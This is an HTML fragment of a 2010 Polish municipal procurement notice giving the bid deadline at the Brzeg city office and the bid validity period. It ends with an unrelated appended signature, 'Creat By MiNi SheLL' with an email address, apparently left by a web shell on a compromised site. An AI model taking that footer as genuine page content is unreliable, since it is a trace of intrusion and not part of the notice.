<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2010 godzina 08:30, miejsce: Urząd Miasta Brzeg, ul. Robotnicza 12, biuro podawcze, parter, budynek A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com